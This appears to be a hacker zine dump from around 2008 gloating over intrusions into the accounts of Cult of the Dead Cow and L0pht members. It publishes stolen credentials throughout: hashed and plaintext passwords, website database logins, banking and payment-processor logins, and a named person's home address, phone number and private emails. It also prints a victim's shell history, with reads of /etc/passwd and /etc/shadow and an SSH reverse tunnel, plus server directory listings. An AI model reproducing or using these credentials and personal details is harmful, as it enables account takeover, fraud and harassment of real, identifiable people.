-meyer1274:bernal_meyer@hotmail.com:d270a41d40b1210d271c6994a97e3855 -bill:darien@alltel.net:2531ab02c7acaa443b929c48d69e9db0 -King:christinalowe28@hotmail.com:707db461259b6261a2d6c42e940b1acc -mehdikh:meshkat313@yahoo.com:0b974be7b5796383633dd41a213729e9 -errnst:errnst@hotmail.com:3873e36c01e153c9dc7d51935296167d -gkytyb:yamaholic350@aol.com:2cdaab9a734212de4c96eb139b4b50e1 -wcichy:w_cichy@op.pl:4cd7a79b955d9c715681001c7ad4d0ee -ethical_hacker:hunt_1_0@yahoo.co.in:96bb5a8ad257636c74c794d54c527296 -ernstl:contact@inode.at:3d3d286a8d153a4a58156d0e02d8570c -loca:lauryn@hotpop.com:7ad6899e574aa9887c05ba81c54a67c7 -Waffa:-_-@hot.ee:e27c9dc401260d0be6b89680aa26a077 -kr3mliyn:kr3mliyn@hotmail.com:e3273c6330296eb2b80a509b582a02de -maxcaulfield:maxcaulfield@msn.com:399ea315d53e4b251aa6032762d6cc8b -ttteg:karamizah27@hotmail.com:358227693c1705a21427343500c363e9 -ELGWADY:ELGWADY2000@HOTMAIL.COM:113b7adb85a79d8a5e6d4a73b6c2c4c4 -nikon:nando_torres@hotmail.com:7a49a8c6de350ab40a73d3b008ba884e -ranandthirth:ranandthirth@yahoo.com:22c99198a901e2e552d82015755c03c0 -maryprez:mprzewlo@mitre.org:e4cc569e5887704b04678ed686ce0798 -linux77ab:jamodio789@hotmail.com:8035182510cbb92933c1331e00621e32 -Doraemon:dhik_dor@yahoo.com:a7339b9a593e455e82d15d4364b6e10b -thekhan52:thekhan52@dodgeit.com:74c59db120d9a2992e797cb994b1dd4c -TeenPirate:TeenPirate@undergroundwar.com:1113420c26730c9e96956d9b609a77b6 -InuYasha:wrestlerchamp777@aol.com:be3524763e03b7cd0ceb4c09387d7a28 -JxT:jtibbs@secnetops.com:6388e2c9e84de26d040539daa15e2245 - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - -I have been quite graciously drafted into the CULT OF THE DEAD COW's -Ninja Strike Force. Curious what that means? It means I'm now a part of -the most elite public collective. Their name appears in hundreds of -books, including text books. There isn't all that much more to say about -it than that. Expect me to start churning out the most badass tools and -information in the name of the cDc NSF. - -~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -comradesmack@comradesmack.com / 1ll3g4l4life - -http://webmail.comradesmack.com/src/webmail.php -// ** MySQL settings ** // -define('DB_NAME', 'blog'); // The name of the database -define('DB_USER', 'comradesmack'); // Your MySQL username -define('DB_PASSWORD', '1ll3g4l4life'); // ...and password -define('DB_HOST', 'db.comradesmack.com'); // ...and the server MySQL is -running on - -~~~~~~~~~~ His lame bookmarks ~~~~~~~~~~~~ - -http://mail.google.com/mail/ -http://wiki.rpg.net/index.php?title=Special:Contributions&target=GnomeWorks -http://www.comradesmack.com/cms/ -http://taylorcreekhowto.com/wp-login.php -http://whatis.techtarget.com/definition/0,289893,sid9_gci826135,00.html -http://www.thelearnlist.com/flash.html -http://math-blog.com/2007/07/17/ten-must-read-books-about-mathematics/ -http://cultdeadcow.com/cowfeed/ -http://www.Bovinedawn.com -http://www.google.com/coop/cse?cx=013687219756243773077:h89nqxzdlze -http://www.sofiatopia.org/maat/heavenly_cow.htm -http://www.ibiblio.org/jstrout/uploading/ -http://www.mindshop.com/hkshome.nsf/cc97044cc273b6ffca256f23000c7e98/342d2f4e76d8e47c4a256a150001294e?OpenDocument -http://www.consciousentities.com/ -http://www.vaniercollege.qc.ca/Auxiliary/Psychology/Frank/Thirdwave.html -http://pcp.lanl.gov/INTRO.html -http://math.bu.edu/people/rclewley/jom.html -http://www.uplink.com.au/lawlibrary/Documents/Docs/Doc64.html -http://www.web-writer.net/fantasy/#culture_building -http://hiddenway.tripod.com/world/ -http://www.zeuscmd.com/tutorials/index.php -http://www.planetside.co.uk/gallery/v/tg09gallery/CraterLake_aerial.jpg.html -http://www.planetside.co.uk/terragen/productmain.shtml -http://www.world-builders.org/ -http://www.sdzc.net/ -http://www.io.com/~sjohn/demog.htm -http://www.geocities.com/Area51/8306/utilities.html#weathergen -http://wohba.com/pages/whiteboard1006.html -http://www.tutorialdownloads.com/ -http://thinkzone.wlonk.com/ArithShortcuts/ShortestShortcut.htm -http://www.levenez.com/lang/history.html -http://www.aridolan.com/ad/adb/adtop.html -http://www.transhumanist.com/volume1/moravec.htm -http://www.techtutorials.net/ -http://www.rootsecure.net/content/downloads/pdf/?C=S;O=A -http://www.filiberto.org/archive/2006/06/how-to-configure-windows-opensave-dialogue-to-meet-your-needs/ -http://www.inventgeek.com/ -http://miqel.com/entheogens/terrence_mckenna_interview_1.html -http://www.thedigitalbeat.com/10about.html -http://www.ny-dev.com/forums/f225/software-piracy-what-you-should-know-1545/#post6696 -http://cs.umaine.edu/~chaitin/sciamer2.html -http://www.whytheluckystiff.net/ruby/pickaxe/ -http://www.chaoslogic.org/library/collection/ -http://onestepback.org/articles/invitationtoruby/reason4.html -http://www.onlamp.com/pub/a/onlamp/2004/11/18/extending_ruby.html -http://www.team509.com/download/docs/security/hacking/ -http://www.virangar.org/Tutorial/E-Book-Orginal/?N=D -http://101out.com/all.php -http://www.ted.com/talks/view/id/144 -http://inexistentmansblog.wordpress.com/2007/05/05/incredible-freeware-list-download-450-free-software/ -http://www.comp.hkbu.edu.hk/~comp2650/lecture/ -http://members.aol.com/aprilnotafool/ebooks/index.html -http://www.virangar.org/Tutorial/E-Book-Orginal/ -http://www.harding.edu/USER/fmccown/WWW/vbnet_csharp_comparison.html -http://www.hackits.de/tutorials/eng/tuts/hackingbasics/ -http://poignantguide.net/ruby/chapter-4.html -http://english-75635646158.spampoison.com/ -http://www.wellho.net/solutions/php-pattern-matching-a-primer-on-regular-expressions.html -http://www.virangar.org/Tutorial/E-Book-Orginal/Rapidshare%20Trick%20No%20Waiting.txt -http://samanathon.com/set-your-ip-address-via-batch-file/ -http://www.yvoschaap.com/wpthemegen/ -http://ftp.okradio.net/~krnjaca.com/ftp/Windows%20xp%20KeyGens%20&%20Cracks%20&%20Appz/ -http://www.frogview.com/show2.php?file=1984 -http://www.evanolds.com/movtogifsimple.html -http://www.dailywireless.com/features/secure-wireless-lan-021507/ -http://kevin.vanzonneveld.net/techblog/article/block_brute_force_attacks_with_iptables/ -http://www.teckh.com/?p=143 -http://dailyrevolver.com/2007/08/18/online-generators-and-tools-via-cssjuicecom/ -http://ftp.build.bg/Books_and_Help/Books/_programming/ -http://techrythm.com/index.php/learn-python-in-10-minutes/ -http://virangar.org/Tutorial/E-Book-Orginal/?N=D -http://packetstormsecurity.org/docs/hack/hackfaq-99/hackfaq-17.html -http://irdial.hyperreal.org/the%20conet%20project/disc%204/ -http://dwindlinginunbelief.blogspot.com/2007/01/how-many-has-god-killed-complete-list.html -http://kociemba.org/cube.htm -http://www.androidblues.com/gallery/34/ -http://www.bumbinorn.ru/2007/02/22/hambo_lama_48654.html -http://haha.nu/amazing/67-versions-of-a-3d-sphere/ -http://www.thinkingapeblues.com/ -http://www.globalserve.net/~sarlo/Ymeme.htm -http://www.plantsciences.ucdavis.edu/ce/king/PoisPlant/Tox-COM.htm -http://eatliver.com/i.php?n=1297 -http://jslibrary.org/onslaught/onslaught.swf -http://esoteric227.googlepages.com/trackingdownascammer -http://img87.imageshack.us/img87/2574/dsc006514209f4ov8.jpg -http://www.timknowles.co.uk/Default.aspx?tabid=296 -http://www.pleix.net/films.html -http://www.churchofeuthanasia.org/e-sermons/butcher.html -http://whimsypress.com/ -http://www.asahi-net.or.jp/~if2n-szk/mnemonics.html -http://how-to-learn-any-language.com/e/ -http://www.sil.org/linguistics/GlossaryOfLinguisticTerms/contents.htm -http://www.google.com/search?q=lojban&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a -http://www.tlg.uci.edu/~opoudjis/lojbanbrochure/lessons/less5events.html -http://www.lojban.org/jboski/index.php -http://www.lojban.org/tiki/tiki-index.php?page=Everyday+Lojban&bl -file:///C:/Documents%20and%20Settings/Administrator/Local%20Settings/lojban/chapter5.html -http://www.tlg.uci.edu/~opoudjis/lojbanbrochure/lessons/book1.html - -~~~~~~~~~~~~~~~ 0wned ~~~~~~~~~~~~~~~~~~~~~ - -$ ls -la -total 60 -drwxr-x--x 8 comradesmack pg1268972 4096 Jan 13 00:10 . -drwxr-x--x 38 root 1000 4096 Jan 16 02:29 .. --rw-r--r-- 1 comradesmack pg1268972 260 Nov 27 1999 .alias --rw------- 1 comradesmack pg1268972 4480 Jan 13 00:10 .bash_history --rw-r--r-- 1 comradesmack pg1268972 81 Nov 20 2002 .bash_profile --rw-r--r-- 1 comradesmack pg1268972 55 Nov 27 1999 .bashrc --rw-r--r-- 1 comradesmack pg1268972 417 Nov 8 2000 .cshrc -drwx------ 2 comradesmack pg1268972 4096 Oct 26 16:58 .links -drwxr-xr-x 2 comradesmack pg1268972 4096 Jan 10 18:52 .ssh --rw------- 1 comradesmack pg1268972 7687 Jan 13 00:10 .viminfo -drwx------ 10 comradesmack pg1268972 4096 Aug 29 16:36 Maildir -drwxr-xr-x 17 comradesmack pg1268972 4096 Jan 15 13:18 comradesmack.com -drwxr-xr-x 7 comradesmack pg1268972 4096 Jul 25 08:11 comradesmack.com.old -dr-xr-x--- 3 comradesmack dhapache 4096 Jun 5 2007 logs - -$ cat .bash_history -ls -cd comradesmack.com/ -ls -ls -l -vi -vi .htaccess -ls -cd cms -ls -vi .htacess -grep htaccess -ls -cd .. -ls -cd .. -ls -cd logs -ls -cd comradesmack.com/ -ls -cd http -ls -cd .. -cd .. -ls -cd .. -ls -cd Maildir/ -ls -cd cur -ls -cd .. -cd .. -ls -cd comradesmack.com/ -ls -ls -cd comradesmack.com/ -ls -cd cms -ls -pwd -copy -cpy -cp -cp wp-login.php /home/comradesmack/comradesmack.com/admin -cd .. -ls -cd admin -ls -ls -cd .. -ls -ls -a -cd cms -ls -a -vi .htaccess -vi wp-login.php -ls -cd .. -ls -cd admin -ls -vi .htaccess -vi .htaccess -vi .htaccess -vi .htaccess -ls -cd .. -ls -cd cms -ls -cd wp-content -ls -cd themes -ls -cd drunklosertemplate2/ -ls -cd drunkloser/ -ls -cd .. -ls -cd .. -ls -ls -ls -pwd -cd .. -cd .. -cd ../../.. -ls -cd .. -cd .. -cd .. -cd .. -ls -pwd -cd home -ls -cd comradesmack -ls -cd comradesmack.com/ -ls -vi .htaccess -ls -cd comradesmack.com/ -ls -vi .htaccess -dir -ls -cd comradesmack.com/ -ls -vi .htaccess -cd cms -ls -vi .htacceess -vi .htaccess -:q -ls -vi .htaccess -vi .htaccess -pwd -cd comradesmack.com/ -ls -cd cms -cd wp-con -cd wp-content -ls -cd plugins -vi .htaccess -vi .htaccess -vi .htaccess -vi .htaccess -vi .htaccess -pwd -cd /home -cd comradesmack -cd comradesmack.com/ -ls -vi .htaccess -cd /cms/wp-content/plugins -ls -pwd -cd cms -cd wp-content/plugins -rm .htaccess -cd /home/comradesmack -cd comradesmack.com/ -vi .htaccess -vi .htaccess -vi .htaccess -vi -vi .htaccess -vi .htaccess -vi .htaccess -cd comradesmack.com/othershit -vi emailpop.html -vi emailpop.html -vi emailpop.html -vi emailpop.html -cd comradesmack.com/ -cd othershit/ -vi emailpop.html -vi emailpop.html -cd comradesmack.com/ -cd othershit/ -vi emailpop.html -cd comradesmack.com/ -vi .htaccess -cd comradesmack.com/ -cd books/ -vi .htaccess -apt get -apt-get -apt-get ruby -cd .. -pwd -apt-get install ruby -find apache -dir -ls -ll -ls -l -ls -aL -ls -a -alias ls -l ll -man alias -alias /? -alias help -help alias -alias ll=ls -l -alias ll="ls -l" -ll -cd comradesmack.com -ls -ll -ll -alias ll="ls -a" -ll -ll -alias ll="ls -l" -alias ll="ls -al" -ll -vi .htaccess -cd comradesmack.com -vi denied.html -ls -cd comradesmack.com -ls -vi denied. -ls -vi denied.html -passwd -passwd -ls -cd comradesmack.com -ls -vi denied.html -ls -cd comradesmack.com -ls -cd books -ls -ls > books.txt -ls -rm books.txt -vi .htaccess -uname -exit -ls -cd comradesmack.com -ls -cd othershit/ -cd -ls -cd comradesmack.com -ls -cd othershit/ -ls -vi scr-bx -vi wserv -vi BitchX -./BitchX -./BitchX irc.efnet.net -ls -cd comradesmack.com -ls -cd othershit -l -ls -./BitchX -chmod BitchX 777 -chmod 777 BitchX -BitchX -./BitchX -ls -cd .. -cd .. -cd .. -ls -ls -cd /home -ls -cd /comradesmack -cd /comsma -ls -dir -pwd -dir -uptime -su -links www.comradesmack.com -cd comradesmack.com -vi denied -ls -vi denied.html -uptime -ls -cd comradesmack.com -ls -vi endofnet.html -vi endofnet.html -vi endofnet.html -vi endofnet.html -ls -updatedb -ls -find stuff -find Stuff -whereis Stuff -cd Stuff -ls -su fuckme -ls -ssh -f -N -R 10000:localhost:22 comradesmack@208.113.199.231 -ls -netstat -ps -aux | grep sshd -cd comradesmack.com -ls -cd cms -ls -cd wp-admin -ls -cd .. -ls -vi .htaccess -cd wp-admin -vi .htaccess -cd .. -ls -cd /admin -cd .. -cd /admin -cd admin -vi .htaccess -ls -cat /etc/passwd -cat etc/passwd > passwd.txt -ls -cd .. -ls -cat etc/passwd > passwd.txt -vi passwd.txt -cat etc/passwd > passwd.txt -cat /etc/passwd > passwd.txt -vi passwd.txt -cat /etc/shadow -cat /etc/httpd/conf/httpd.conf -pwd -ls -prs -prc -process -1- -10 -netstat -netcat -netstat -ps -pwd -ls -get -ls -cd .. -ls -cd com -ls -lsw -links -links google.com -links mountainbay.com -links google.com -ls -cd comradesmack.com -ls -cd trinitywiki/ -ls -cd MediaWIKI/ -ls -cd mediawiki-1.6.10/ -ls -./INSTALL -chmod 777 INSTALL -./INSTALL -LS -ls -config -vi config/ -cd config/ -ls -pwd -cd / -ls -cd home -ls -cd comsma -cd cms -cd comradesmack.com -cd cms -ls -vi wp-config.php -cd .. -ls -cd trinitywiki/ -ls -vi LocalSettings.php -ls -ls -cd comradesmack.com -cd trinitywiki/ -ls -vi LocalSettings.php -ls -l -chmod 777 images -vi LocalSettings.php -vi LocalSettings.php -vi LocalSettings.php -vi LocalSettings.php -vi LocalSettings.php -vi LocalSettings.php -ls -rm -rf MediaWIKI -ls -cd ma -cd math -ls -cd .. -ls -ls -l -cat FAQ -vi LocalSettings.php -cp LocalSettings.php LocalSettings2.php -vi LocalSettings -vi LocalSettings.php -vi LocalSettings.php -ls -rm LocalSettings.php -cp LocalSettings2.php LocalSettings.php -ls -cd comradesmack.com -ls -cd trinitywiki/ -ls -vi LocalSettings.php -vi LocalSettings.php -vi LocalSettings.php -ls -cd comradesmack.com -ls -vi .htaccess -vi .htaccess -cd comradesmack.com -vi .htaccess -vi .htaccess -vi .htaccess -ls -ls -l -ls -a -rm .htaccess.swp -ls -ls -ls -a -vi .htaccess -vi .htaccess -cd comradesmack.com -vi .ht -vi .htaccess -exit - -$ cat .ssh/known_hosts -208.113.199.231 ssh-rsa -AAAAB3NzaC1yc2EAAAABIwAAAIEApMr6cEY236fOHLpAnJ/iMjksHNSbPoQwC6/pcr9RVv -IEpjSw/ohtS3XzCAgt4orh/XslpktpQVvkPFeDFsvGscTRj82EI3fMMYyycU6Qr5WxyfIC -49NQwPPLoZUp5adfVr560B2pfcsdi+WoHT0ZlQd9ufCtVescPML8PkBT/X0= - -$ ls -la comradesmack.com/ -total 944 -drwxr-xr-x 19 comradesmack pg1268972 4096 May 8 09:09 . -drwxr-xr-x 9 comradesmack pg1268972 4096 Mar 28 13:11 .. --rw-r--r-- 1 comradesmack pg1268972 292 May 8 09:20 .htaccess --rw-r--r-- 1 comradesmack pg1268972 15503 Apr 11 15:28 1.tsk --rwxr-xr-x 1 comradesmack pg1268972 90871 Nov 26 08:25 1559621337_l.jpg --rw-r--r-- 1 comradesmack pg1268972 3744 Mar 28 13:11 41index.html -drwxr-xr-x 2 dhapache dhapache 4096 Dec 19 07:45 admin -drwxr-xr-x 3 comradesmack pg1268972 4096 Oct 26 2007 b2ds -drwxr-xr-x 9 comradesmack pg1268972 4096 Feb 1 13:40 backup-manager-0.6.3 --rwxr-xr-x 1 comradesmack pg1268972 5 Feb 21 10:57 bleh --rwxr-xr-x 1 comradesmack pg1268972 198707 Dec 19 12:59 bookmarks.html -drwxr-xr-x 2 comradesmack pg1268972 8192 Aug 15 2007 books -drwxr-xr-x 8 comradesmack pg1268972 4096 Dec 19 07:45 cal --rw-r--r-- 1 comradesmack pg1268972 43723 Apr 11 15:15 cdc.jpg --rw-r--r-- 1 comradesmack pg1268972 17722 Apr 11 15:15 cdc.png -drwxr-xr-x 5 comradesmack pg1268972 4096 Apr 29 05:58 cms --rw-rw-rw- 1 comradesmack pg1268972 78 Mar 17 09:17 code.txt --rwxr-xr-x 1 comradesmack pg1268972 928 Dec 12 13:27 copyleft.html --rwxr-xr-x 1 comradesmack pg1268972 1540 Aug 29 2007 denied.html -drwxr-xr-x 14 comradesmack pg1268972 4096 Oct 4 2007 dp --rwxr-xr-x 1 comradesmack pg1268972 732 Sep 6 2007 endofnet.html --rwxr-xr-x 1 comradesmack pg1268972 4846 Jun 6 2007 favicon.ico --rw-r--r-- 1 comradesmack pg1268972 199102 Feb 29 09:25 fox.html --rwxr-xr-x 1 comradesmack pg1268972 1369 Feb 20 14:00 goolag.html -drwxr-xr-x 2 comradesmack pg1268972 4096 May 6 12:15 images --rwxr-xr-x 1 comradesmack pg1268972 609 Jan 28 12:28 index.html --rwxr-xr-x 1 comradesmack pg1268972 94 Jan 11 13:31 index_o.php --rwxr-xr-x 1 comradesmack pg1268972 15127 Apr 1 2003 license.txt --rw-r--r-- 1 comradesmack pg1268972 90891 Mar 15 15:28 logo.jpg --rwxr-xr-x 1 comradesmack pg1268972 3977 Jan 30 11:57 logobutton.png -drwxr-xr-x 18 comradesmack pg1268972 4096 Sep 7 2007 m00sik --rwxr-xr-x 1 comradesmack pg1268972 10067 Jan 30 12:01 menubar.png -drwxr-xr-x 4 comradesmack pg1268972 4096 Apr 1 13:36 othershit --rwxr-xr-x 1 comradesmack pg1268972 47748 Oct 1 2007 passwd.txt -drwxr-xr-x 2 comradesmack pg1268972 4096 Aug 17 2007 personal -drwxr-xr-x 3 comradesmack pg1268972 4096 Feb 19 14:48 pr0n --rw-r--r-- 1 comradesmack pg1268972 56 Mar 15 15:03 proj.txt --rwxr-xr-x 1 comradesmack pg1268972 165 Jan 28 13:37 refer.php -drwxr-xr-x 2 comradesmack pg1268972 4096 Jul 30 2007 research --rw-r--r-- 1 comradesmack pg1268972 8318 Mar 26 13:25 session.php --rwxr-xr-x 1 comradesmack pg1268972 35076 Mar 10 10:47 sitemap.xml --rwxr-xr-x 1 comradesmack pg1268972 3717 Mar 10 10:47 sitemap.xml.gz --rw-rw-rw- 1 comradesmack pg1268972 136 Mar 17 09:10 test.html --rw-r--r-- 1 comradesmack pg1268972 101 Mar 13 10:04 test.php --rw-r--r-- 1 comradesmack pg1268972 74 Mar 15 01:08 tester.php -drwxr-xr-x 14 comradesmack pg1268972 4096 Dec 12 12:52 trinitywiki -drwxr-xr-x 4 comradesmack pg1268972 4096 Jul 30 2007 wp-admin -drwxr-xr-x 5 comradesmack pg1268972 4096 Jul 30 2007 wp-content -drwxr-xr-x 4 comradesmack pg1268972 4096 Jun 20 2007 wp-includes -$ du -hs comradesmack.com/pr0n/ -103M /home/.tasha/comradesmack/comradesmack.com/pr0n - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - -dildog - one of the two "hackers" the cdc point to from the 90s that they -built rep on. - -Christien Rioux -crioux@gmail.com - zuul69 -password for every linkedin, wordpress, support forum, sales website in -existence: zuul69 or zuul6969 or Zuul69 -781 899 7202 -Christien Rioux -294 Linden St -Waltham, MA 02452 - -This guys has more contacts than a spammer. His whole life, online and off, - is in this inbox. - -/////////////////////////////// -When L0phtCrack was purchased by @stake (by way of Directed Doodling, -and 'SST'), there was some language that you had placed in the -contract that, if i am correct, would result in a reversion of -ownership to the original authors in the event that the program is not -made commercially available for more than a year. - -If you could take a quick look for a copy of that contract in your -files, that would be great. We are considering commercializing the -product again in a slightly different form if we can get Symantec (the -last owners) to cough it up. We feel they are still bound by these -agreements, and we'd like to find fresh copies of them, and get an -opinion on how to proceed. - ---chris - - -///////////////////////////// -Bank of America (www.bankofamerica.com) - -Acct #00461735XXXX -Routing ABA #01100XXXX -Wire ABA #02600XXXX - -Online ID at www.bankofamerica.com is: bitmark1091 -Online passcode is: B1tm4XXXX (capital B-one-tm-four-XXXX) - -Debit/ATM card is in the mail for both us. - -// X's have been inserted by ZF0. We're too kind. We do archive though. - -//////////////////////////// -your stacythayer.com wordpress account is: - -l: sthayer -p: suffolk!! - - -l0pht chats: - -/////////////////////////////////////////////// -Space Rogue: - -http://www.darkreading.com/document.asp?doc_id=144609&WT.svl=news1_2 - -My favorite line, - -"and Space Rogue (still Space Rogue)" HA! - -- SR - -Paul Nash: Who is designing the limited run '08 l0pht reunion tour tshirts? -Peiter Mudge Zatko: That would be cool. Why does everyone keep calling me -Division Scientist? I'm... -/////////////////////////////////////////////// - -Ya, know for a bunch of people who were very close friends we sure have -messed things up. The only person I ever had any ill will against was Mudge -and while that is not a hundred percent resolved and probably never will be -I've tried to put it behind me. As for the wedding I don't think I ever -officially knew you two were married I just assumed it I think. I suspect at -the time of your wedding I probably wasn't a very socialable person anyway -and most likely would not have attended even if invited. Invitations or lack -thereof to things like weddings and such don't bother me. Those are rather -personal events and it doesn't bother me in the least if I am or I am not -invited. - -- SR - -On 4/18/08 8:13 PM, "Stacy Thayer" <sthayer@gmail.com> wrote: - -> I'm sorry you weren't invited to our wedding. Not that it was a thing...and -> look how it turned out. But, he thinks you don't like him. - -Don't worry, Cris, I like ya just fine. - -Things definitely got pretty distant after people started trickling -away from @stake. I can't say that I've done a very good job of -maintaining any kind of social behavior whatsoever. That said, I've -always been more concerned that if I make a whole bunch of friends -that I wouldn't be able to maintain the relationships responsibly, -when I made all that company stuff my top priority. It's coming up on -ten years that I will have been fighting to finish the software I -started on in 2000. I suppose this is what I was meant to do :P And -frankly, if it doesn't work out for me, I'm going to be hella pissed -and I'm going to be even more intolerable for a while (if that's -possible). - -Anyway, I dont want anyone to think my distance has been because I -dont like them. I dont know how anyone got that idea from me, other -than the fact that I've been a pretty grumpy dude lately in general. I -suppose you might know what that's like ;) - ---chris - - -/////////////////////////////////////////////// -'ll put up whatever you guys want, just send me the links. I'd rather post -links than host content though but as long as it is text that should be OK. -At the same time I'd rather not have hundreds of links to crap, just the -juicy stuff. I added the Cyber UL since it seems to be getting some press -lately and the Buffer Overflow thing since it is listed in Mudge's wikipedia -page. - -Speaking of which we can add all the advisories to the Wikipedia page, I -have no qualms about editing it myself as long as someone sends me the -links. Or is one of the VDB's out there have a cool search engine where we -can link to all the old advisories at once that would be cool to. - -I'll add the dates to the pages as soon as I have ten minutes. Same for your -email forward Tan. Probably Wednesday. -/////////////////////////////////////////////// - - -I have two accounts with Authorize.net, and I wish to cancel -one- of -them since it's not configured correctly and I dont need to be paying -twice. - -The credentials are: -login: bitmark1091 -password: B1tm4rk00 -secret question: Pet's name -secret question answer: Monkey - -Please terminate that account. Thanks. - ---chris - -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - .-. _ _ .-. - / \ .-. ((___)) .-. / \ - /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ --/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- -/THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ - \ / `-' (U) `-' \ / - `-' `-' -WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED - - - -# -# -# _ ___ _ ___ _ __ -# | | / _ \ | |__ \| |/ / -# | |__ | | | |_ ___ __ ___ __| | ) | ' / -# | '_ \| | | \ \ /\ / / '_ \ / _ \/ _` | / /| < -# | |_) | |_| |\ V V /| | | | __/ (_| |/ /_| . \ -# |_.__/ \___/ \_/\_/ |_| |_|\___|\__,_|____|_|\_\ -# -# -# FOR TOO LONG the cDc has ridden -# on the coat tails of this tool! -# It is owned like the rest of -# you -# .__=\__ .__==__, -# jf' ~~=\, _=/~' `\, -# ._jZ' we `\q, /=~ THE `\__ Started this hack not expecting -# j5(/ 0wned `\./ END... V\\, BO2K to be dead but in the end -# .Z))' _____ BO2K | .____, \)/\ it was and is. So now its -# j5(K=~~ ~~~~\=_, | _/=~~~~' `~~+K\\, time to finalize this shit -# .Z)\/ `~=L | _=/~ t\ZL -# j5(_/.__/===========\__ ~q |j/ .__============___/\J(N, You will not be missed. -# 4L#XXXL_________________XGm, \P .mXL_________________JXXXW8L -# ~~~~~~~~~~~~~~~~~~~~~~~~~YKWmmWmmW@~~~~~~~~~~~~~~~~~~~~~~~~~~ Fuck Y.ooM -# - - - - SET IT OFFFFF: - -.: -total 36K -drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 . -drwxr-xr-x 660 root root 12K Apr 29 13:10 .. -drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 cgi-bin -drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 htdocs -drwxrwsr-x 7 103 5487 4.0K Jan 30 2004 old_site -drwxrwsr-x 8 58519 5487 4.0K Mar 23 2003 old_site2 --rw-rw-r-- 1 126114 5487 27 Jun 30 2005 robots.txt - -./cgi-bin: -total 20K -drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 . -drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 .. -drwxrwxr-x 3 126114 5487 4.0K Mar 20 13:50 axs -drwxrwxr-x 2 127066 5487 4.0K Aug 15 2006 coranto --rwx------ 1 126114 5487 1.2K Feb 24 2007 emailer.pl - -./cgi-bin/axs: -total 200K -drwxrwxr-x 3 126114 5487 4.0K Mar 20 13:50 . -drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 .. --rwxrwxrwx 1 126114 users 116K Mar 20 13:50 ax-admin.pl --rwxrwxr-x 1 126114 5487 23K Mar 20 13:50 ax.pl --rwx------ 1 126114 5487 0 Oct 10 2004 axs.dat --rwxrwxr-x 1 126114 5487 11K Aug 16 2005 convert.pl -drwxrwxrwx 2 126114 5487 4.0K Aug 16 2005 data --rwxrwxr-x 1 126114 5487 7.7K Aug 16 2005 find_replace.pl --rwx------ 1 126114 5487 4.6K Aug 16 2005 license.html --rwx------ 1 126114 5487 0 Oct 10 2004 log.txt --rwxrwxr-x 1 126114 5487 107 Aug 16 2005 red.gif --rwxrwxr-x 1 126114 5487 8.2K Aug 16 2005 tracker.jpg - -./cgi-bin/coranto: -total 340K -drwxrwxr-x 2 127066 5487 4.0K Aug 15 2006 . -drwxrwsr-x 4 103 5487 4.0K Mar 29 16:26 .. --rw-rw-r-- 1 126114 users 614 Jul 28 2001 archive.tmpl --rw-rw-r-- 1 126114 users 583 Jul 28 2001 arclink.tmpl --rw-rw-r-- 1 126114 users 8.4K Jun 28 2004 changelog.txt --rwxrwxrwx 1 126114 users 9.5K Jun 28 2004 coranto.cgi --rw-rw-r-- 1 126114 users 3.0K Nov 24 2002 cra_backup.pl --rw-rw-r-- 1 126114 users 8.6K May 5 2003 craddon.pl --rw-rw-r-- 1 126114 users 87K Jun 28 2004 cradmin.pl --rw-rw-r-- 1 126114 users 1.1K Jan 14 2003 cra_modifyusercol.pl --rw-rw-r-- 1 126114 users 13K Sep 9 2003 cra_ncategory.pl --rw-rw-r-- 1 126114 users 78K Jun 28 2004 crcore.pl --rw-rw-r-- 1 126114 users 6.5K Jul 28 2001 crcrypt.pl --rw-rw-r-- 1 126114 users 4.3K Jul 28 2001 crlang.pl --rw-rw-r-- 1 126114 users 32K Jun 28 2004 crlib.pl --rw-rw-r-- 1 126114 users 16K May 5 2003 crsetup.pl --rw-rw-r-- 1 126114 users 2.6K Aug 15 2006 cruser.pl --rw-rw-r-- 1 127066 users 178 Jul 28 2001 .htaccess --rw-rw-r-- 1 126114 users 7.1K Jun 28 2004 viewnews.cgi --rw-rw-r-- 1 126114 users 508 Nov 25 2002 viewnews-readme.txt --rw-rw-r-- 1 126114 users 90 Jul 28 2001 viewnews.tmpl - -./htdocs: -total 1000K -drwxrwsr-x 24 nobody 5487 4.0K May 5 13:29 . -drwxrwsr-x 6 103 5487 4.0K Sep 5 2006 .. -drwxr-sr-x 2 252872 5487 4.0K Sep 4 2007 bo2k -drwxrwsr-x 6 142021 5487 4.0K Oct 15 2006 buda -drwxrwxr-x 5 58519 5487 4.0K Jan 17 2007 community --rw-rw-r-- 1 58519 5487 26K May 17 2002 converter.html -drwxrwxrwx 3 58519 5487 4.0K Sep 2 2006 coranto -drwxrwxr-x 5 58519 5487 4.0K Mar 23 2007 dev -drwxrwsr-x 2 126114 5487 4.0K Jul 